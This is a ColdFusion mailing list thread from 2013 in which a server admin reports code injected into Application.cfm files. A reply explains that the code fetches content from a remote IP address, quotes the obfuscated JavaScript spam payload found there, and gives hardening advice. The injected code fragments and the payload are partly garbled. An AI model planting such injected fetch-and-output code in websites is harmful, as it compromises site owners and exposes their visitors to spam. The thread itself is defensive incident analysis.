files. It doesn't need this level of permissions. Doing this > won't close the vulnerability used to inject the code in the first > place, but it will prevent it from doing anything. > > Then, once you've done that, read the CF 9 Lockdown Guide and follow > its instructions as best you can. You should do this as a matter of > course for any CF server install. > > > http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > http://training.figleaf.com/ > > Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on > GSA Schedule, and provides the highest caliber vendor-authorized > instruction at our training centers, online, or onsite. > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354230 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files so the attack would have most likely come in via CF somewhere. -Original Message- From: Dave Watts [mailto:dwa...@figleaf.com] Sent: Saturday, February 02, 2013 11:49 AM To: cf-talk Subject: Re: Possible Hack? > I noticed my CF server started timing out a lot lately. Then I looked at the > code and on the Application.cfm page at the > top was this code that I didn't put there. Anybody know what this is and how > it might have gotten on the Application.cfm > pages of the sites on this VPS? Not sure how it got there. Any help in > plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The "somewhere else" is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: function zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v.'+x[2]+'{'+x[1]+'}'+x[0]+'>');}zdrViewState(); followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354229 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
> I noticed my CF server started timing out a lot lately. Then I looked at the > code and on the Application.cfm page at the > top was this code that I didn't put there. Anybody know what this is and how > it might have gotten on the Application.cfm > pages of the sites on this VPS? Not sure how it got there. Any help in > plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The "somewhere else" is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: function zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v.'+x[2]+'{'+x[1]+'}'+x[0]+'>');}zdrViewState(); followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Possible Hack?
I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#"; userAgent = "Archivver"> #mmy# ",paga) GT 0)> ", "#cfs#", "one")> ",paga) GT 0)> ", "#cfs#", "one")> ",paga) GT 0)> ", "#cfs#", "one")> ", "#cfs#", "one")> #paga# ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm